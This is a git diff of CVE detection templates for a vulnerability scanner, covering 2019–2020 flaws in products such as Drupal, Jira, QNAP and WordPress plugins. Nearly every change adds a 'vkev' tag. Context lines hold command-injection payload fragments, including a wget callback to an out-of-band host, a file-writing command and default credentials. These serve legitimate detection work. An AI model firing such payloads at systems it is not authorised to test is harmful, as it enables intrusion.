be7634ef784..fdb4493b9fe 100644 --- a/http/cves/2019/CVE-2019-3929.yaml +++ b/http/cves/2019/CVE-2019-3929.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: crestron product: am-100_firmware - tags: cve,cve2019,tenable,oast,injection,kev,edb,rce,packetstorm,crestron + tags: cve,cve2019,tenable,oast,injection,kev,edb,rce,packetstorm,crestron,vkev http: - method: POST diff --git a/http/cves/2019/CVE-2019-5127.yaml b/http/cves/2019/CVE-2019-5127.yaml index fada793be87..4bac495c30d 100644 --- a/http/cves/2019/CVE-2019-5127.yaml +++ b/http/cves/2019/CVE-2019-5127.yaml @@ -27,7 +27,7 @@ info: max-request: 4 vendor: youphptube product: youphptube_encoder - tags: cve,cve2019,rce,youphptube + tags: cve,cve2019,rce,youphptube,vkev variables: filename: "{{to_lower(rand_text_alpha(5))}}" encode: "`id > {{filename}}.txt`" diff --git a/http/cves/2019/CVE-2019-5128.yaml b/http/cves/2019/CVE-2019-5128.yaml index 23f5c84f5f2..142f37d58e4 100644 --- a/http/cves/2019/CVE-2019-5128.yaml +++ b/http/cves/2019/CVE-2019-5128.yaml @@ -21,7 +21,7 @@ info: vendor: youphptube product: youphptube_encoder fofa-query: icon_hash="-276846707" - tags: cve,cve2019,youphptube,intrusive,encoder + tags: cve,cve2019,youphptube,intrusive,encoder,vkev variables: file_name: "{{rand_text_alpha(4)}}.txt" diff --git a/http/cves/2019/CVE-2019-5129.yaml b/http/cves/2019/CVE-2019-5129.yaml index 806a868df86..a19d9b7d000 100644 --- a/http/cves/2019/CVE-2019-5129.yaml +++ b/http/cves/2019/CVE-2019-5129.yaml @@ -21,7 +21,7 @@ info: vendor: youphptube product: youphptube_encoder fofa-query: icon_hash="-276846707" - tags: cve,cve2019,youphptube,rce,encoder + tags: cve,cve2019,youphptube,rce,encoder,vkev variables: file_name: "{{rand_text_alpha(4)}}.txt" diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml index 299c9f9a014..cb8c12a86ca 100644 --- a/http/cves/2019/CVE-2019-5418.yaml +++ b/http/cves/2019/CVE-2019-5418.yaml @@ -28,7 +28,7 @@ info: vendor: rubyonrails product: rails shodan-query: cpe:"cpe:2.3:a:rubyonrails:rails" - tags: cve,cve2019,rails,lfi,disclosure,edb,rubyonrails,kev + tags: cve,cve2019,rails,lfi,disclosure,edb,rubyonrails,kev,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index 5324f182efb..d66d786a907 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"drupal" - cpe:"cpe:2.3:a:drupal:drupal" - tags: cve,cve2019,drupal,rce,kev + tags: cve,cve2019,drupal,rce,kev,vkev http: - method: POST diff --git a/http/cves/2019/CVE-2019-7139.yaml b/http/cves/2019/CVE-2019-7139.yaml index 12153bf7cb8..21c35850f3d 100644 --- a/http/cves/2019/CVE-2019-7139.yaml +++ b/http/cves/2019/CVE-2019-7139.yaml @@ -32,7 +32,7 @@ info: - http.component:"Magento" - cpe:"cpe:2.3:a:magento:magento" - http.component:"magento" - tags: time-based-sqli,cve,cve2019,sqli,magento + tags: time-based-sqli,cve,cve2019,sqli,magento,vkev flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index eff20727d68..7e6f681ac34 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -40,7 +40,7 @@ info: google-query: - intitle:"qnap" - intitle:"photo station" - tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss + tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-7194.yaml b/http/cves/2019/CVE-2019-7194.yaml index f572e9c84ce..eb4161429d1 100644 --- a/http/cves/2019/CVE-2019-7194.yaml +++ b/http/cves/2019/CVE-2019-7194.yaml @@ -32,7 +32,7 @@ info: google-query: - intitle:"photo station" - intitle:"qnap" - tags: cve,cve2019,qnap,rce,photostation,unauth,injection,lfi,kev,intrusive + tags: cve,cve2019,qnap,rce,photostation,unauth,injection,lfi,kev,intrusive,vkev variables: cleanup_payload: "" diff --git a/http/cves/2019/CVE-2019-7195.yaml b/http/cves/2019/CVE-2019-7195.yaml index 90f18a030c2..80eb73ef6c5 100644 --- a/http/cves/2019/CVE-2019-7195.yaml +++ b/http/cves/2019/CVE-2019-7195.yaml @@ -34,7 +34,7 @@ info: google-query: - intitle:"photo station" - intitle:"qnap" - tags: cve,cve2019,kev,qnap,lfi + tags: cve,cve2019,kev,qnap,lfi,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml index e83596d6ac5..6a2a491f485 100644 --- a/http/cves/2019/CVE-2019-7238.yaml +++ b/http/cves/2019/CVE-2019-7238.yaml @@ -27,7 +27,7 @@ info: vendor: sonatype product: nexus fofa-query: title="nexus repository manager" - tags: cve,cve2019,nexus,rce,kev,sonatype + tags: cve,cve2019,nexus,rce,kev,sonatype,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index 5c316d72796..e4ecf185023 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"emerge" fofa-query: title="emerge" google-query: intitle:"emerge" - tags: cve,cve2019,emerge,lfi,edb,packetstorm,nortekcontrol + tags: cve,cve2019,emerge,lfi,edb,packetstorm,nortekcontrol,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml index 31e5e51c9d6..7175a6a0b31 100644 --- a/http/cves/2019/CVE-2019-7256.yaml +++ b/http/cves/2019/CVE-2019-7256.yaml @@ -34,7 +34,7 @@ info: - http.title:"emerge" fofa-query: title="emerge" google-query: intitle:"emerge" - tags: cve,cve2019,emerge,rce,edb,nortekcontrol,kev + tags: cve,cve2019,emerge,rce,edb,nortekcontrol,kev,vkev variables: file: "{{rand_text_alpha(10)}}" diff --git a/http/cves/2019/CVE-2019-7276.yaml b/http/cves/2019/CVE-2019-7276.yaml index 19e92403360..dc25648b236 100644 --- a/http/cves/2019/CVE-2019-7276.yaml +++ b/http/cves/2019/CVE-2019-7276.yaml @@ -23,7 +23,7 @@ info: vendor: optergy product: enterprise,proton shodan-query: html:"Optergy" - tags: cve,cve2019,optergy,proton,backdoor,rce,intrusive + tags: cve,cve2019,optergy,proton,backdoor,rce,intrusive,vkev flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-7481.yaml b/http/cves/2019/CVE-2019-7481.yaml index d0dd23d614b..10f6e5da8a3 100644 --- a/http/cves/2019/CVE-2019-7481.yaml +++ b/http/cves/2019/CVE-2019-7481.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: sonicwall product: sma_100_firmware - tags: cve,cve2019,sonicwall,sqli,kev + tags: cve,cve2019,sonicwall,sqli,kev,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml index 44aadaafffb..bf54a0ab86a 100644 --- a/http/cves/2019/CVE-2019-7609.yaml +++ b/http/cves/2019/CVE-2019-7609.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"kibana" fofa-query: title="kibana" google-query: intitle:"kibana" - tags: cve,cve2019,kibana,rce,kev,elastic + tags: cve,cve2019,kibana,rce,kev,elastic,vkev http: - method: POST diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index e5674cb9b43..2064e8d1700 100644 --- a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -31,7 +31,7 @@ info: - http.component:"atlassian jira" - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:jira" - tags: cve,cve2019,atlassian,jira,lfi,intrusive + tags: cve,cve2019,atlassian,jira,lfi,intrusive,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index 78b411b8850..b9c7c2ddacf 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve,cve2019,jira,atlassian + tags: cve,cve2019,jira,atlassian,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml index 6a3835aa2b5..730af7eeb93 100644 --- a/http/cves/2019/CVE-2019-8451.yaml +++ b/http/cves/2019/CVE-2019-8451.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve,cve2019,atlassian,jira,ssrf,oast,tenable,hackerone + tags: cve,cve2019,atlassian,jira,ssrf,oast,tenable,hackerone,vkev http: - method: POST diff --git a/http/cves/2019/CVE-2019-8982.yaml b/http/cves/2019/CVE-2019-8982.yaml index 9ffe6409601..b4b6c9e1b15 100644 --- a/http/cves/2019/CVE-2019-8982.yaml +++ b/http/cves/2019/CVE-2019-8982.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: wavemaker product: wavemarker_studio - tags: cve,cve2019,wavemaker,lfi,ssrf,edb + tags: cve,cve2019,wavemaker,lfi,ssrf,edb,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-9194.yaml b/http/cves/2019/CVE-2019-9194.yaml index 95ec9fbbfdd..ce68c8c729c 100644 --- a/http/cves/2019/CVE-2019-9194.yaml +++ b/http/cves/2019/CVE-2019-9194.yaml @@ -27,7 +27,7 @@ info: vendor: studio-42 product: elfinder shodan-query: 'http.title:"elfinder"' - tags: cve,cve2019,elfinder,rce,intrusive,file-upload + tags: cve,cve2019,elfinder,rce,intrusive,file-upload,vkev variables: rand_string: '{{to_lower(rand_text_alpha(6))}}' diff --git a/http/cves/2019/CVE-2019-9618.yaml b/http/cves/2019/CVE-2019-9618.yaml index 744918c296b..8cf8c7f7254 100644 --- a/http/cves/2019/CVE-2019-9618.yaml +++ b/http/cves/2019/CVE-2019-9618.yaml @@ -26,7 +26,7 @@ info: vendor: gracemedia_media_player_project product: gracemedia_media_player framework: wordpress - tags: cve,cve2019,wordpress,wp-plugin,lfi,seclists,edb,gracemedia_media_player_project + tags: cve,cve2019,wordpress,wp-plugin,lfi,seclists,edb,gracemedia_media_player_project,vkev http: - method: GET diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml index 71fe9271bed..0c9535188d3 100644 --- a/http/cves/2019/CVE-2019-9670.yaml +++ b/http/cves/2019/CVE-2019-9670.yaml @@ -38,7 +38,7 @@ info: google-query: - intitle:"zimbra collaboration suite" - intitle:"zimbra web client sign in" - tags: cve,cve2019,zimbra,xxe,kev,edb,packetstorm,synacor + tags: cve,cve2019,zimbra,xxe,kev,edb,packetstorm,synacor,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index 088521c8cb8..be23fda92d0 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml @@ -27,7 +27,7 @@ info: vendor: jfrog product: artifactory shodan-query: cpe:"cpe:2.3:a:jfrog:artifactory" - tags: cve,cve2019,packetstorm,artifactory,login,jfrog + tags: cve,cve2019,packetstorm,artifactory,login,jfrog,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-9762.yaml b/http/cves/2019/CVE-2019-9762.yaml index 4953f864980..6d81dd6a543 100644 --- a/http/cves/2019/CVE-2019-9762.yaml +++ b/http/cves/2019/CVE-2019-9762.yaml @@ -23,7 +23,7 @@ info: vendor: phpshe product: phpshe fofa-query: app="PHPSHE" - tags: cve,cve2019,phpshe,sqli + tags: cve,cve2019,phpshe,sqli,vkev variables: num: "999999999" diff --git a/http/cves/2019/CVE-2019-9879.yaml b/http/cves/2019/CVE-2019-9879.yaml index 7235c23f013..63b40011245 100644 --- a/http/cves/2019/CVE-2019-9879.yaml +++ b/http/cves/2019/CVE-2019-9879.yaml @@ -25,7 +25,7 @@ info: product: wpgraphql framework: wordpress fofa-query: body="/wp-content/plugins/wp-graphql/" - tags: cve,cve2019,wp-graphql,wpengine,wordpress,wp-plugin,intrusive + tags: cve,cve2019,wp-graphql,wpengine,wordpress,wp-plugin,intrusive,vkev variables: username: "{{to_lower(rand_text_alphanumeric(6))}}" diff --git a/http/cves/2019/CVE-2019-9880.yaml b/http/cves/2019/CVE-2019-9880.yaml index ecd93688795..cc308b60c3b 100644 --- a/http/cves/2019/CVE-2019-9880.yaml +++ b/http/cves/2019/CVE-2019-9880.yaml @@ -31,7 +31,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/wp-graphql/" publicwww-query: "/wp-content/plugins/wp-graphql/" - tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,info-leak + tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,info-leak,vkev http: - raw: diff --git a/http/cves/2019/CVE-2019-9881.yaml b/http/cves/2019/CVE-2019-9881.yaml index bce788e35c9..6136943949f 100644 --- a/http/cves/2019/CVE-2019-9881.yaml +++ b/http/cves/2019/CVE-2019-9881.yaml @@ -32,7 +32,7 @@ info: shodan-query: http.title:"WordPress" "graphql" fofa-query: body="/wp-content/plugins/wp-graphql/" publicwww-query: "/wp-content/plugins/wp-graphql/" - tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth + tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,vkev variables: string: "{{randstr}}" diff --git a/http/cves/2019/CVE-2019-9978.yaml b/http/cves/2019/CVE-2019-9978.yaml index b15f01eaebf..98e62cb314b 100644 --- a/http/cves/2019/CVE-2019-9978.yaml +++ b/http/cves/2019/CVE-2019-9978.yaml @@ -27,7 +27,7 @@ info: product: social_warfare framework: wordpress fofa-query: body="social-warfare" && body="wp-" - tags: cve,cve2019,wordpress,wp-plugin,ssrf,kev,warfareplugins,xss + tags: cve,cve2019,wordpress,wp-plugin,ssrf,kev,warfareplugins,xss,vkev flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-0618.yaml b/http/cves/2020/CVE-2020-0618.yaml index 0284b34fda6..200f8087f59 100644 --- a/http/cves/2020/CVE-2020-0618.yaml +++ b/http/cves/2020/CVE-2020-0618.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: microsoft product: sql_server - tags: cve,cve2020,rce,packetstorm,microsoft,kev + tags: cve,cve2020,rce,packetstorm,microsoft,kev,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-10148.yaml b/http/cves/2020/CVE-2020-10148.yaml index 63108d3e272..cac3f3a68e4 100644 --- a/http/cves/2020/CVE-2020-10148.yaml +++ b/http/cves/2020/CVE-2020-10148.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: solarwinds product: orion_platform - tags: cve2020,cve,solarwinds,rce,auth-bypass,kev + tags: cve2020,cve,solarwinds,rce,auth-bypass,kev,vkev variables: string: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 6a28d67afff..6806de2a958 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -33,7 +33,7 @@ info: - app="zoho-manageengine-desktop" shodan-query: http.title:"manageengine desktop central 10" google-query: intitle:"manageengine desktop central 10" - tags: cve,cve2020,kev,zoho,manageengine,deserialization,intrusive + tags: cve,cve2020,kev,zoho,manageengine,deserialization,intrusive,vkev flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index abc529e58e9..5fe47de69f2 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml @@ -28,7 +28,7 @@ info: vendor: sonatype product: nexus fofa-query: title="nexus repository manager" - tags: cve2020,cve,packetstorm,sonatype,nexus,rce,kev + tags: cve2020,cve,packetstorm,sonatype,nexus,rce,kev,vkev variables: username: admin password: admin123 diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml index 8f182c62397..f3d695e77a1 100644 --- a/http/cves/2020/CVE-2020-10546.yaml +++ b/http/cves/2020/CVE-2020-10546.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve2020,cve,rconfig,sqli + tags: cve2020,cve,rconfig,sqli,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index e36cbba867e..b3c3703df84 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve,cve2020,rconfig,sqli + tags: cve,cve2020,rconfig,sqli,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index 1cf79298121..c43cd7640ee 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -36,7 +36,7 @@ info: - icon_hash=-1105083093 - body="keycloak" google-query: intitle:"keycloak" - tags: cve,cve2020,keycloak,ssrf,oast,blind,packetstorm,edb,redhat + tags: cve,cve2020,keycloak,ssrf,oast,blind,packetstorm,edb,redhat,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-10987.yaml b/http/cves/2020/CVE-2020-10987.yaml index 9ec0e3cf7c5..e532e09d6c2 100644 --- a/http/cves/2020/CVE-2020-10987.yaml +++ b/http/cves/2020/CVE-2020-10987.yaml @@ -21,7 +21,7 @@ info: max-request: 2 vendor: tenda product: ac15_firmware - tags: cve,cve2020,tenda,rce,kev,unauth + tags: cve,cve2020,tenda,rce,kev,unauth,vkev variables: payload: "wget http://{{interactsh-url}}" diff --git a/http/cves/2020/CVE-2020-11455.yaml b/http/cves/2020/CVE-2020-11455.yaml index a00ca188142..859f2535b59 100644 --- a/http/cves/2020/CVE-2020-11455.yaml +++ b/http/cves/2020/CVE-2020-11455.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: limesurvey product: limesurvey - tags: cve2020,cve,lfi,edb,packetstorm,limesurvey + tags: cve2020,cve,lfi,edb,packetstorm,limesurvey,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-11514.yaml b/http/cves/2020/CVE-2020-11514.yaml index 2b648cb1f03..a4ac432cdd6 100644 --- a/http/cves/2020/CVE-2020-11514.yaml +++ b/http/cves/2020/CVE-2020-11514.yaml @@ -25,7 +25,7 @@ info: product: seo framework: wordpress publicwww-query: "/wp-content/plugins/seo-by-rank-math/" - tags: cve,cve2020,wordpress,wordfence,seo-by-rank-math,wp-plugin,priv-esc,unauth + tags: cve,cve2020,wordpress,wordfence,seo-by-rank-math,wp-plugin,priv-esc,unauth,vkev variables: objecttype: "{{randstr}}" diff --git a/http/cves/2020/CVE-2020-11515.yaml b/http/cves/2020/CVE-2020-11515.yaml index 7d19156ceb2..3a23bdf4f27 100644 --- a/http/cves/2020/CVE-2020-11515.yaml +++ b/http/cves/2020/CVE-2020-11515.yaml @@ -26,7 +26,7 @@ info: product: seo framework: wordpress publicwww-query: "/wp-content/plugins/seo-by-rank-math/" - tags: cve,cve2020,wordpress,wordfence,redirect,seo-by-rank-math,wp-plugin,wp + tags: cve,cve2020,wordpress,wordfence,redirect,seo-by-rank-math,wp-plugin,wp,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index cc6c6d757c0..6ea814b0985 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -30,7 +30,7 @@ info: vendor: idangero product: chop_slider framework: wordpress - tags: time-based-sqli,cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero + tags: time-based-sqli,cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml index 4c44a8583f2..b1eda24272f 100644 --- a/http/cves/2020/CVE-2020-11546.yaml +++ b/http/cves/2020/CVE-2020-11546.yaml @@ -32,7 +32,7 @@ info: - http.title:"superwebmailer" fofa-query: title="superwebmailer" google-query: intitle:"superwebmailer" - tags: cve,cve2020,rce,superwebmailer + tags: cve,cve2020,rce,superwebmailer,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-11738.yaml b/http/cves/2020/CVE-2020-11738.yaml index b78cf03accf..a78b097206c 100644 --- a/http/cves/2020/CVE-2020-11738.yaml +++ b/http/cves/2020/CVE-2020-11738.yaml @@ -32,7 +32,7 @@ info: product: duplicator framework: wordpress google-query: inurl:"/wp-content/plugins/duplicator" - tags: cve,cve2020,kev,tenable,packetstorm,wordpress,wp-plugin,lfi,snapcreek + tags: cve,cve2020,kev,tenable,packetstorm,wordpress,wp-plugin,lfi,snapcreek,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index 5247f322eab..a865a302059 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -33,7 +33,7 @@ info: - html:"Mitel" html:"MiCollab" - http.html:"mitel" html:"micollab" fofa-query: body="mitel" html:"micollab" - tags: cve,cve2020,packetstorm,mitel,micollab,lfi + tags: cve,cve2020,packetstorm,mitel,micollab,lfi,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index 2ba989e1931..0c6b83b85a5 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: microfocus product: application_performance_management - tags: cve2020,cve,microfocus,packetstorm,ucmdb,rce + tags: cve2020,cve,microfocus,packetstorm,ucmdb,rce,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-11975.yaml b/http/cves/2020/CVE-2020-11975.yaml index 8b361cf4bab..0007a6f70cc 100644 --- a/http/cves/2020/CVE-2020-11975.yaml +++ b/http/cves/2020/CVE-2020-11975.yaml @@ -30,7 +30,7 @@ info: product: unomi shodan-query: http.title:"Apache Unomi" fofa-query: title="Apache Unomi" - tags: cve,cve2020,apache,unomi,rce,ognl,oast + tags: cve,cve2020,apache,unomi,rce,ognl,oast,vkev http: - method: POST diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index 6cac1b19e0d..fa0220f36d3 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"sign in - airflow" - intitle:"airflow - dags" || http.html:"apache airflow" - tags: cve2020,cve,packetstorm,apache,airflow,rce,kev + tags: cve2020,cve,packetstorm,apache,airflow,rce,kev,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-11984.yaml b/http/cves/2020/CVE-2020-11984.yaml index 94b42d842b2..d18041d9121 100644 --- a/http/cves/2020/CVE-2020-11984.yaml +++ b/http/cves/2020/CVE-2020-11984.yaml @@ -24,7 +24,7 @@ info: vendor: apache product: http_server shodan-query: cpe:"cpe:2.3:a:apache:http_server" - tags: cve,cve2020,apache,httpd,rce + tags: cve,cve2020,apache,httpd,rce,vkev variables: oast: ".{{interactsh-url}}" diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index fef97744ccd..55649b48ccf 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -30,7 +30,7 @@ info: - http.html:"Apache Cocoon" - http.html:"apache cocoon" fofa-query: body="apache cocoon" - tags: cve,cve2020,apache,xml,cocoon,xxe + tags: cve,cve2020,apache,xml,cocoon,xxe,vkev http: - method: POST diff --git a/http/cves/2020/CVE-2020-12124.yaml b/http/cves/2020/CVE-2020-12124.yaml index 0dc21029c5a..07a7b001f15 100644 --- a/http/cves/2020/CVE-2020-12124.yaml +++ b/http/cves/2020/CVE-2020-12124.yaml @@ -25,7 +25,7 @@ info: product: wn530h4_firmware shodan-query: http.html:"wavlink" fofa-query: body="wavlink" - tags: cve,cve2020,rce,wavlink + tags: cve,cve2020,rce,wavlink,vkev variables: str: "{{rand_base(3)}}" num: "{{rand_int(1, 10)}}" diff --git a/http/cves/2020/CVE-2020-12641.yaml b/http/cves/2020/CVE-2020-12641.yaml index 38eb136fca1..087dea89cc4 100644 --- a/http/cves/2020/CVE-2020-12641.yaml +++ b/http/cves/2020/CVE-2020-12641.yaml @@ -32,7 +32,7 @@ info: shodan-query: - http.component:"roundcube" - cpe:"cpe:2.3:a:roundcube:webmail" - tags: cve,cve2020,roundcube,webmail,intrusive,kev + tags: cve,cve2020,roundcube,webmail,intrusive,kev,vkev http: - method: POST diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index 2e6560621e5..4c23025922a 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -38,7 +38,7 @@ info: google-query: - intext:"powered by vbulletin" - intitle:"powered by vbulletin" - tags: cve2020,cve,vbulletin,sqli,packetstorm + tags: cve2020,cve,vbulletin,sqli,packetstorm,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-12800.yaml b/http/cves/2020/CVE-2020-12800.yaml index 88532c7a183..cd8bb686992 100644 --- a/http/cves/2020/CVE-2020-12800.yaml +++ b/http/cves/2020/CVE-2020-12800.yaml @@ -28,7 +28,7 @@ info: vendor: codedropz product: drag_and_drop_multiple_file_upload_-_contact_form_7 framework: wordpress - tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce,packetstorm,intrusive,codedropz + tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce,packetstorm,intrusive,codedropz,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index 8be882a2d7c..cbce58255d6 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -29,7 +29,7 @@ info: vendor: wavlink product: wn575a4 shodan-query: http.title:"Wi-Fi APP Login" - tags: cve,cve2020,wavlink,rce,oast,router + tags: cve,cve2020,wavlink,rce,oast,router,vkev http: - raw: diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index dc659b63107..37fb078341c 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -29,7 +29,7 @@ info: product: artica_proxy shodan-query: http.html:"artica" fofa-query: body="artica" - tags: cve,cve2020,artica,lfi,articatech + tags: cve,cve2020,artica,lfi,articatech,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index feaf8b2afc3..a9cd94528ed 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: netsweeper product: netsweeper - tags: cve2020,cve,netsweeper,rce,python,webadmin + tags: cve2020,cve,netsweeper,rce,python,webadmin,vkev variables: rand_str: "{{randstr}}" cmd: 'echo "{{base64(rand_str)}}" | base64 -d > /usr/local/netsweeper/webadmin/out' diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index 48cabea7455..f3deca2ab3c 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -36,7 +36,7 @@ info: - title="grafana" - app="grafana" google-query: intitle:"grafana" - tags: cve2020,cve,grafana,ssrf + tags: cve2020,cve,grafana,ssrf,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index 85d19deed99..dc269e1dd6b 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -29,7 +29,7 @@ info: product: bitrix24 shodan-query: http.html:"/bitrix/" fofa-query: body="/bitrix/" - tags: cve2020,cve,xss,bitrix,bitrix24 + tags: cve2020,cve,xss,bitrix,bitrix24,vkev http: - method: GET diff --git a/http/cves/2020/CVE-2020-13638.yaml b/http/cves/2020/CVE-2020-13638.yaml index 599b618cad1..f43d1e2cd67 100644 --- a/http/cves/2020/CVE-2020-13638.yaml +++ b/http/cves/2020/CVE-2020-13638.yaml @@ -28,7 +28,7 @@ info: - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve,cve2020,rconfig,auth-bypass,intrusive + tags: cve,cve2020,rconfig,auth-bypass,intrusive,vkev variables: username: "{{to_lower(rand_text_alpha(5))}}" password: "{{rand_text_alphanumeric(12)}}!" diff 